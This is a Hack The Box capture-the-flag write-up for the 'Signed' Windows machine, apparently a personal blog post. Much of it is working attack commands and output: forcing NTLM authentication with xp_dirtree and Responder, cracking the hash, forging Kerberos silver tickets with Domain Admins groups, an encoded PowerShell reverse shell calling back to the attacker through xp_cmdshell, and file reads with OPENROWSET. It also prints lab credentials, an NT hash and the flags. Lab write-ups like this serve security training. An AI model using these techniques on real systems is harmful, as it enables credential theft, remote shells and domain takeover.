Hack The Box: Signed
Hack The Box: Signed
Signed is a medium-difficulty Windows machine where we start with provided MSSQL credentials (scott / Sm230#C5NatH) → abuse xp_dirtree + Responder to capture & crack the mssqlsvc NTLMv2 hash (purPLE9795!@) → log in as mssqlsvc → extract domain SID → forge silver ticket as Administrator → enable xp_cmdshell and get reverse shell (user flag) → forge another silver ticket with Domain Admins group (512) → enable Ad Hoc Distributed Queries and read root.txt
Enumeration
Nmap Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
┌──(sanke㉿vbox)-[~/Downloads/signed]
└─$ nmap -A -v 10.10.11.90
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-02 12:03 EST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:03
Completed NSE at 12:03, 0.00s elapsed
Initiating NSE at 12:03
Completed NSE at 12:03, 0.00s elapsed
Initiating NSE at 12:03
Completed NSE at 12:03, 0.00s elapsed
Initiating Ping Scan at 12:03
PORT STATE SERVICE VERSION
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-info:
| 10.10.11.90:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.10.11.90:1433:
| Target_Name: SIGNED
| NetBIOS_Domain_Name: SIGNED
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: SIGNED.HTB
| DNS_Computer_Name: DC01.SIGNED.HTB
| DNS_Tree_Name: SIGNED.HTB
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-11-02T17:04:28+00:00; +6s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-31T04:03:19
| Not valid after: 2055-10-31T04:03:19
| MD5: acad:1cd6:2c88:8c44:af3b:a9f7:cedb:f4d0
|_SHA-1: abbf:bb58:6505:0373:eea2:3d1e:89a9:721b:8cfe:a1e3
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
We have only one port open which is 1433 assigned to mssql server which is obvious because they already gived us credentials to access MSSQL.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(sanke㉿vbox)-[~/Downloads/signed]
└─$ impacket-mssqlclient 'signed.htb/scott'@10.10.11.90
Impacket v0.13.0.dev0+20250422.104055.27bebb13 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (scott guest@master)>
Going deep in enumeration we found nothing as i tried all this commands.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
SQL (scott guest@msdb)> enable_xp_cmdshell
ERROR(DC01): Line 105: User does not have permission to perform this action.
ERROR(DC01): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(DC01): Line 105: User does not have permission to perform this action.
ERROR(DC01): Line 1: You do not have permission to run the RECONFIGURE statement.
SQL (scott guest@msdb)> enum_users
UserName RoleName LoginName DefDBName DefSchemaName UserID SID
------------------ -------- --------- --------- ------------- ---------- -----
dbo db_owner sa master dbo b'1 ' b'01'
guest public NULL NULL guest b'2 ' b'00'
INFORMATION_SCHEMA public NULL NULL NULL b'3 ' NULL
sys public NULL NULL NULL b'4 ' NULL
SQL (scott guest@msdb)> enum_impersonate
execute as database permission_name state_desc grantee grantor
---------- -------- --------------- ---------- ------- -------
SQL (scott guest@msdb)>
After searching more I found that xp_dirtree is working but it’s not giving us any output.
1
2
3
4
SQL (scott guest@msdb)> xp_dirtree \\10.10.11.90\
subdirectory depth file
------------ ----- ----
SQL (scott guest@msdb)>
So, I searched in google for an attack vector to get Hashes as i remember finding an attack using xp_dirtree + responder. And I was right because I found this Medium blog
https://duckwrites.medium.com/capture-ntlm-hashes-with-mssql-an-essential-oscp-tip-0c2433a7815a
Exploitation
I started the responder
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
┌──(sanke㉿vbox)-[~/Downloads/signed]
└─$ sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.6.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.223]
Responder IPv6 [dead:beef:4::10dd]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]
[+] Current Session Variables:
Responder Machine Name [WIN-43IZNKFYL9O]
Responder Domain Name [7CTK.LOCAL]
Responder DCE-RPC Port [48640]
[+] Listening for events...
And what I did is trying xp_dirtree with calling my IP and a share name that it can be anything.
1
2
3
4
SQL (scott guest@msdb)> xp_dirtree \\<YOUR-IP>\a
subdirectory depth file
------------ ----- ----
SQL (scott guest@msdb)>
And going back to our responder I found a hash which is related to a user called “mssqlsvc”
1
2
3
4
5
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.90
[SMB] NTLMv2-SSP Username : SIGNED\mssqlsvc
[SMB] NTLMv2-SSP Hash : mssqlsvc::SIGNED:c286ee8c7f8e04bd:3A9580905F0427D3EA5EC357810E1DB2:0101000000000000803E2473F84BDC01D4DBA20C4AF70F7900000000020008003700430054004B0001001E00570049004E002D003400330049005A004E004B00460059004C0039004F0004003400570049004E002D003400330049005A004E004B00460059004C0039004F002E003700430054004B002E004C004F00430041004C00030014003700430054004B002E004C004F00430041004C00050014003700430054004B002E004C004F00430041004C0007000800803E2473F84BDC01060004000200000008003000300000000000000000000000003000003A45DC0EA5F3C04F970E4727EBCA7D297958B1B8075F6D50508A57D6927E0C610A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310036002E003200320033000000000000000000
Let’s crack the password using hashcat now.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
┌──(sanke㉿vbox)-[~/Downloads/signed]
└─$ hashcat -m 5600 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #1: cpu-haswell-AMD Ryzen 5 3600 6-Core Processor, 4301/8666 MB (2048 MB allocatable), 5MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
MSSQLSVC::SIGNED:c286ee8c7f8e04bd:3a9580905f0427d3ea5ec357810e1db2:0101000000000000803e2473f84bdc01d4dba20c4af70f7900000000020008003700430054004b0001001e00570049004e002d003400330049005a004e004b00460059004c0039004f0004003400570049004e002d003400330049005a004e004b00460059004c0039004f002e003700430054004b002e004c004f00430041004c00030014003700430054004b002e004c004f00430041004c00050014003700430054004b002e004c004f00430041004c0007000800803e2473f84bdc01060004000200000008003000300000000000000000000000003000003a45dc0ea5f3c04f970e4727ebca7d297958b1b8075f6d50508a57d6927e0c610a001000000000000000000000000000000000000900220063006900660073002f00310030002e00
310030002e00310036002e003200320033000000000000000000:purPLE9795!@
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: MSSQLSVC::SIGNED:c286ee8c7f8e04bd:3a9580905f0427d3e...000000
Time.Started.....: Sun Nov 2 13:11:00 2025 (3 secs)
Time.Estimated...: Sun Nov 2 13:11:03 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1858.2 kH/s (1.62ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4490240/14344385 (31.30%)
Rejected.........: 0/4490240 (0.00%)
Restore.Point....: 4485120/14344385 (31.27%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: purdaliza -> punkrocker95
Hardware.Mon.#1..: Util: 25%
Started: Sun Nov 2 13:10:56 2025
Stopped: Sun Nov 2 13:11:04 2025
Let’s go!!! we found our password which is “purPLE9795!@” related to the user “mssqlsvc”.
Now we need to relogin to the mssql server but this time using our new user.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(sanke㉿vbox)-[~/Downloads/signed]
└─$ impacket-mssqlclient 'signed.htb/mssqlsvc'@10.10.11.90 -windows-auth
Impacket v0.13.0.dev0+20250422.104055.27bebb13 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (SIGNED\mssqlsvc guest@master)>
After digging in this sql server i found nothing So I said why not forging a silver ticket and impersonnate the Administrator. So, I got the domain SID using this command
1
2
3
4
5
6
7
SQL (SIGNED\mssqlsvc guest@msdb)> select SUSER_SID() asa;
asa
-----------------------------------------------------------
b'0105000000000005150000005b7bb0f398aa2245ad4a1ca44f040000'
SQL (SIGNED\mssqlsvc guest@msdb)>
Using the AI I managed to convert that HEX and get the domain-sid = ‘S-1-5-21-4088429403-1159899800-2753317549’
Now let’s go and forge a silver ticket.
1
2
3
4
5
impacket-ticketer -nthash EF699384C3285C54128A3EE1DDB1A0CC\
-domain SIGNED -dc-ip 10.10.11.90 \
-domain-sid S-1-5-21-4088429403-1159899800-2753317549 \
-spn MSSQLSvc/10.10.11.90:1433 \
Administrator
Btw the nthash here is the NTLM of the password ‘purPLE9795!@’.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(sanke㉿vbox)-[~/Downloads/signed]
└─$ impacket-ticketer -nthash EF699384C3285C54128A3EE1DDB1A0CC\
-domain SIGNED -dc-ip 10.10.11.90 \
-domain-sid S-1-5-21-4088429403-1159899800-2753317549 \
-spn MSSQLSvc/10.10.11.90:1433 \
Administrator -groups 1105
Impacket v0.13.0.dev0+20250422.104055.27bebb13 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for SIGNED/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccache
Now let’s export our ticket.
1
2
3
4
5
6
7
8
9
10
11
┌──(sanke㉿vbox)-[~/Downloads/signed]
└─$ export KRB5CCNAME=Administrator.ccache
┌──(sanke㉿vbox)-[~/Downloads/signed]
└─$ klist -c $KRB5CCNAME
Ticket cache: FILE:Administrator.ccache
Default principal: Administrator@SIGNED
Valid starting Expires Service principal
11/02/2025 14:02:07 10/31/2035 15:02:07 MSSQLSvc/10.10.11.90:1433@SIGNED
renew until 10/31/2035 15:02:07
Let’s connect again but this time using the Administrator.
1
2
3
4
5
6
7
8
9
10
11
12
13
──(sanke㉿vbox)-[~/Downloads/signed]
└─$ impacket-mssqlclient -k SIGNED/Administrator@10.10.11.90 -no-pass
Impacket v0.13.0.dev0+20250422.104055.27bebb13 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (SIGNED\Administrator dbo@master)>
Now let’s go and do a reverse shell to get shell as mssqlsrv.
1
2
3
4
SQL (SIGNED\Administrator dbo@master)> enable_xp_cmdshell
INFO(DC01): Line 196: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
INFO(DC01): Line 196: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (SIGNED\Administrator dbo@master)>
Ok actually for reverse shell i have this github repository that got a simple python script to generate a powershell reverse shell encoded in base64.
https://gist.github.com/tothi/ab288fb523a4b32b51a53e542d40fe58#file-mkpsrevshell-py
I downloaded the script and executed it.
1
2
3
┌──(sanke㉿vbox)-[~/Downloads/signed]
└─$ python3 rev.py <YOUR-IP> 4444
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMgAyADMAIgAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA
Now we copy the payload and execute it in the mssqlserver.
1
SQL (SIGNED\Administrator dbo@master)> xp_cmdshell "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMgAyADMAIgAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"
And on our listener we got the user shell.
1
2
3
4
5
6
┌──(sanke㉿vbox)-[~/Downloads/signed]
└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.16.223] from (UNKNOWN) [10.10.11.90] 63510
PS C:\Users\mssqlsvc\Desktop> type user.txt
769ce41ea8005864fe1dd7f677306f63
Privilege Escalation
So now that we can forge tickets. I said why not try to forge ticket with group 512 which is related to the Domain Admins group.
1
ticketer.py -nthash EF699384C3285C54128A3EE1DDB1A0CC -domain-sid S-1-5-21-4088429403-1159899800-2753317549 -domain SIGNED.HTB -spn MSSQLSvc/DC01.SIGNED.HTB -groups 512,519 -user-id 1103 mssqlsvc
Now we can start the new mssql server and what we will do here is trying to read files in the disk and this is using ‘Ad Hoc Distributed Queries’. Of course we going to read the root.txt which is in the Administrator directory.
1
2
3
4
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries', 1;
RECONFIGURE;
Those commands enable the advanced configuration so we can then enable the Ad Hoc to read files.
Now using the function ‘OPENROWSET()’ we can read files.
1
2
3
4
SQL (SIGNED\mssqlsvc dbo@master)> SELECT * FROM OPENROWSET(BULK 'C:\Users\Administrator\Desktop\root.txt', SINGLE_CLOB) as x;
BulkColumn
---------------------------------------
b'520b6f323c34a4331a3a82b80de14982\r\n'
Let’s go we got out root.txt!!!!
This machine is too different from other specially the way that nmap showed only one port 1433 was insane. I was surprised !!
This post is licensed under CC BY 4.0 by the author.